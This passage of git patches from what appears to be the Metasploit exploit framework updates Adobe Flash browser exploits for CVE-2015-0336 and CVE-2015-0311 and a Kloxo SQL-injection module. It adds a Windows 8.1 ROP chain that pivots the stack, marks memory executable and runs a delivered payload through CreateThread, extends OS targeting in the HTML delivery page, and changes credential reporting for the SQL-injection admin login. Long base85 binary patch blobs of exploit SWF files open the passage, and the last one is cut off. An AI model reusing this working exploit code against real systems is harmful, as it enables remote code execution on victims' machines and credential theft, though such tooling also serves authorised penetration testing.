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
bu!|{6(Vf>XsjQx>le-`QS5qPX{;31Dtm!J!

diff --git a/external/source/exploits/CVE-2015-0336/Exploit.as b/external/source/exploits/CVE-2015-0336/Exploit.as
index 9886106f71..01f0f9279f 100644
--- a/external/source/exploits/CVE-2015-0336/Exploit.as
+++ b/external/source/exploits/CVE-2015-0336/Exploit.as
@@ -30,12 +30,14 @@ package
         private var b64:Base64Decoder = new Base64Decoder()
         private var payload:ByteArray
         private var platform:String
+        private var os:String
         private var original_length:uint = 0
 
         public function Exploit() 
         {
             var i:uint = 0
             platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
             trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
             var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
             var pattern:RegExp = / /g;
@@ -118,8 +120,9 @@ package
                 return
             }
 
-            exploiter = new Exploiter(this, platform, payload, uv)
+            exploiter = new Exploiter(this, platform, os, payload, uv)
         }
+
     }
 }
 
diff --git a/external/source/exploits/CVE-2015-0336/Exploiter.as b/external/source/exploits/CVE-2015-0336/Exploiter.as
index a56ca190ee..9975dc8b6e 100644
--- a/external/source/exploits/CVE-2015-0336/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0336/Exploiter.as
@@ -11,6 +11,7 @@ package
         private var eba:ExploitByteArray
         private var payload:ByteArray
         private var platform:String
+        private var op_system:String
         private var pos:uint
         private var byte_array_object:uint
         private var main:uint
@@ -25,11 +26,12 @@ package
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
         private var spray:Vector.<Object> = new Vector.<Object>(89698)
 
-        public function Exploiter(exp:Exploit, pl:String, p: ByteArray, uv:Vector.<uint>):void
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
         {
             exploit = exp
             payload = p
             platform = pl
+            op_system = os
 
             ev = new ExploitVector(uv)
             if (!ev.is_ready()) return
@@ -133,12 +135,19 @@ package
         private function do_rop():void
         {
             Logger.log("[*] Exploiter - do_rop()")
-            if (platform == "linux")
+            if (platform == "linux") {
                 do_rop_linux()
-            else if (platform == "win")
-                do_rop_windows()
-            else
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
                 return
+            }
         }
 
         private function do_rop_windows():void
@@ -150,7 +159,6 @@ package
             var kernel32:uint = pe.module("kernel32.dll", winmm)            
             var ntdll:uint = pe.module("ntdll.dll", kernel32)
             var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
-            var winexec:uint = pe.procedure("WinExec", kernel32)
             var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
             var createthread:uint = pe.procedure("CreateThread", kernel32)
             var memcpy:uint = pe.procedure("memcpy", ntdll)
@@ -182,14 +190,14 @@ package
 
             // VirtualAlloc
             eba.write(0, memcpy)
-            eba.write(0, 0x70000000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, 0x4000)
             eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
             eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
 
             // memcpy
             eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x70000000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, payload_address + 8)
             eba.write(0, payload.length) 
 
@@ -198,7 +206,7 @@ package
             eba.write(0, buffer + 0x10) // return to fix things
             eba.write(0, 0)
             eba.write(0, 0)
-            eba.write(0, 0x70000000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, 0)
             eba.write(0, 0)
             eba.write(0, 0)
@@ -207,6 +215,73 @@ package
             exploit.toString() // call method in the fake vtable
         }
 
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
         private function do_rop_linux():void
         {
             Logger.log("[*] Exploiter - do_rop_linux()")
@@ -241,8 +316,6 @@ package
             eba.write(0, "\x5f", false)             // pop edi
             eba.write(0, "\x5e", false)             // pop esi
             eba.write(0, "\xc3", false)             // ret
-        
-//            eba.write(buffer + 0x10, "\xcc\xcc\xcc\xcc", false)
 
             // Put the popen parameters in memory
             eba.write(payload_address + 0x8, payload, true) // false
diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
index 67bcc9fdc4..f95e2f8dba 100644
--- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
@@ -51,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
           :arch    => ARCH_X86,
           :os_name => lambda do |os|
             os =~ OperatingSystems::Match::LINUX ||
-              os =~ OperatingSystems::Match::WINDOWS_7
+              os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
           end,
           :ua_name => lambda do |ua|
             case target.name
@@ -116,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
     b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
 
     if target.name =~ /Windows/
       platform_id = 'win'
@@ -130,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" Play="true"/>
     </object>
     </body>
     </html>

From 744baf2d443a227941decf8f16d6e801a9df57b8 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 3 Jun 2015 23:28:35 -0500
Subject: [PATCH 0309/1013] Update kloxo_sqli to use the new cred API

---
 modules/exploits/linux/http/kloxo_sqli.rb | 39 +++++++++++++++++++----
 1 file changed, 32 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb
index d221f58945..39888ff29a 100644
--- a/modules/exploits/linux/http/kloxo_sqli.rb
+++ b/modules/exploits/linux/http/kloxo_sqli.rb
@@ -73,6 +73,32 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class)
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      private_data: opts[:password],
+      origin_type: :service,
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def check
     return Exploit::CheckCode::Safe unless webcommand_exists?
     return Exploit::CheckCode::Safe if exploit_sqli(1, bad_char(0))
@@ -94,13 +120,12 @@ class Metasploit3 < Msf::Exploit::Remote
     @session = send_login
     fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{@password} failed...") if @session.nil?
 
-    report_auth_info(
-      :host => rhost,
-      :port => rport,
-      :user => 'admin',
-      :pass => @password,
-      :type => 'password',
-      :sname => (ssl ? 'https' : 'http')
+    report_cred(
+      ip: rhost,
+      port: rport,
+      user: 'admin',
+      service_name: 'http',
+      password: @password
     )
 
     print_status("#{peer} - Retrieving the server name...")

From ab68d8429b9129c538cf785c6f95ed904fd61754 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 4 Jun 2015 12:10:09 -0500
Subject: [PATCH 0310/1013] Add more targets

---
 data/exploits/CVE-2015-0311/msf.swf           | Bin 20410 -> 20564 bytes
 .../adobe_flash_uncompress_zlib_uaf.rb        |  28 ++++++++----------
 2 files changed, 12 insertions(+), 16 deletions(-)

diff --git a/data/exploits/CVE-2015-0311/msf.swf b/data/exploits/CVE-2015-0311/msf.swf
index 1f38921a2654c4e50f12af878923767cb3fccc64..64d9be5b7614e0e27ed1a242009c08dd3aad6730 100644
GIT binary patch
delta 20443
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
